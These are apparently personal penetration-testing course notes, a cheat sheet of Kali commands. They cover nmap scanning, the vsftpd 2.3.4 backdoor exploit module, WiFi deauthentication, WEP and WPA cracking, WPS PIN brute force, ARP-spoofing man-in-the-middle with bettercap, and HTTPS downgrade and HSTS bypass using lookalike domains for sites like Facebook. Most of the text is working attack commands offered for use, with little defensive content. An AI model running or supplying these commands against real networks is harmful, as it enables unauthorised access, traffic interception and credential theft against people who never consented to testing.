Kali Linux 2020 64-Bit

penetration testing
  • Required Downloads for Virtual Box
  • Password for Windows: “Passw0rd!”

http://old.kali.org/kali-images/kali-2018.4/
https://www.kali.org/downloads/
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Download Custom Kali


https://sourceforge.net/projects/metasploitable/files/

    • to become root please use this command:

    msfadmin@metasploitable:~$ sudo su -

    • to find the IP address of the machine use:

    root@metasploitable:~$ ifconfig

    • to shutdown the machine use this command:

    root@metasploitable:~$ shutdown -h now

    • in Kali to discover all the IPs in the same network use this tool:

    netdiscover -r 192.168.222.0/24

    • in Kali to discover all the ports open on a specific host IPs use nmap tool and output in all possible formats: xml, text, grep and name the file “meta2, insanely fast T5”:

    nmap -v -T5 -p 0-65535 -A 192.168.222.31 -oA meta2
    nmap -v -T4 -A 192.168.222.31 -oA meta2

    • to be able to scan all the open ports you can also use the graphical tool: Zenmap
    • install a ftp client use this command:

    apt-get install ftp

      • connect to that target machine using this command:

    ftp 192.168.222.31

    • there will be a response from vsFTPd 2.3.4:
    • I am going to try to enter the username: anonymous and any password
    • second I am going to use msfadmin:msfadmin
    • to check the available commands on a ftp you can type “?”
    • to set the local location use command “lcd”

    ftp> lcd /root/target/ftp1/
    Local directory now /root/target/ftp1

    • to terminate a ftp connection you can type “bye”
    • you can now start metasploit framework
    • on this website you can find the module that you can use: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

    msf > use exploit/unix/ftp/vsftpd_234_backdoor

    • install nessus on kali:

    root@kali:/home/mateo/Downloads# dpkg -i Nessus-8.10.0-debian6_amd64.deb

    • list of all the Linux commands:

    https://www.mediacollege.com/linux/command/linux-command.html

    • install terminator

    apt-get update
    apt-get install terminator

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    ifconfig wlan0 up

    • Change the state of the wireless card from Managed mode to Monitor mode:

    ifconfig wlan0 down
    airmon-ng check kill
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up

    • Once in monitor mode you can scan for the networks around, by default it scans only 2.4 Ghz networks

    airodump-ng mon0

    • to sniff in 5Ghz network you can use theĀ  “band” argument

    airodump-ng --band a mon0

    • to sniff multiple bands (2.4 and 5 Ghz) at the same time you can use the argument: “–band abg”

    airodump-ng --band abg mon0

    • to listen and capture a specific Access Point BSSID traffic in order to list all the connected stations you can use:

    airodump-ng --bssid 00:11:22:33:44:55 --channel 2 --write test mon0

    • Deauthentication Attack, disconnects any client from any network using the tool: aireplay-ng
    • Client is 00:11:11:11:11:11 and Router (AP) is: 00:22:22:22:22:22

    aireplay-ng --deauth [#DeauthPackets] -a [Network MAC] -c [TargetMAC] [InterfaceName]
    aireplay-ng --deauth 99999999 -a 00:22:22:22:22:22 -c 00:11:11:11:11:11 mon0

    • Analyze the captured IVs (Initialization Vector) (24 bits only) and crack the WEP (wired equivalent privacy) key using aircrack-ng

    aircrack-ng test-01.cap

      • If not a busy network we need to force the AP to generate new IVs first we need to associate with the AP

      aireplay-ng --fakeauth 0 -a [MAC of the AP] -h [MAC of the Kali host] mon0
      aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h 00:22:22:22:22:22 mon0

    • force the AP to generate new IVs now that we are associated with the AP

    aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 00:22:22:22:22:22 mon0

    • WPA encryption usesĀ  TKIP cipher and WPA2 encryption uses CCMP cipher
    • 11 is the AP and 22 is the Kali wifi interface in monitoring mode and 33 is Client connected to the AP
    • how to scan for routers that have the WPS feature enabled use command: “wash”
    • use river tool to brute force the PIN on the WPS feature
    • if reaver tool fails, you can use this older version

    wash --interface mon0
    chmod +x reaver
    ./reaver --BSSID 00:11:11:11:11:11 --channel 6 -h --interface mon0 -vvv --no-associate
    aireplay-ng --fakeauth 30 -a 00:11:11:11:11:11 -h 00:22:22:22:22:22 mon0

    • if the attack using the WPS feature exploit will not work, we need to capture a handshake:

    airodump-ng --bssid 00:11:11:11:11:11 --channel 2 --write handshake mon0
    aireplay-ng --deauth 4 -a 00:11:11:11:11:11 -c 00:33:33:33:33:33 mon0

    • to create a wordlist use the crunch tool:

    crunch [min] [max] [characters] -t[patern] -o[filename]
    crunch 6 8 abcd123% -t a@@@@b -o wordlist.txt
    aircrack-ng handshake-01.cap -w wordlist.txt

    • if the wordlist is too big or the CPU power is not enough you can use services like:

    https://gpuhash.me/

    • to map the network you can also use the tool “netdiscover”

    netdiscover -r 192.168.222.1/24

    • default username and password on jailbreak ios

    root | alpine

    • use arpspoof to redirect traffic, man in the middle attack, also you need to enable port forwarding with :

    arpspoof -i eth0 -t 10.0.2.7 10.0.2.1
    arpspoof -i eth0 -t 10.0.2.1 10.0.2.7
    echo 1 > /proc/sys/net/ipv4/ip_forward

    • to run the tool bettercap (a better tool than arpspoof) use:

    bettercap -iface eth0

    • to enable modules in bettercap:

    net.probe on
    net.show
    help arp.spoof
    set arp.spoof.fullduplex true
    set arp.spoof.targets 10.0.2.7
    arp.spoof on
    net.sniff on
    exit

    • to enable caplet you need to create a txt file with all the commands inside and name it spoof.cap then run bettercap pointing to the caplet:

    bettercap -iface eth0 -caplet /root/spoof.cap

    • tests to be done against this http web address:

    http://vulnweb.com/

    • encrypt HTTP using TLS (Transport Layer Security) or SSL (Secure Sockets Layer)
    • Downgrade the HTTPS connections to HTTP using this caplet that is to be copied in the default location /usr/share/bettercap/caplets
    • here is a copy of the spoof.cap that was used in the example above
    • to display all the available caplets type:

    caplets.show

    • sites like Facebook or Twitter are using HSTS (HTTP Strict Transport Security)
    • to be able to downgrade such protection we need to feed to the browser a similar domain name, like facebook.corn or twiter.com
    • Download bettercap from here
    • Fix HSTS Hijack caplet dial tcp error
    • to start the webserver in Kali:

    service apache2 start

    • default address of the webserver is:

    /var/www/html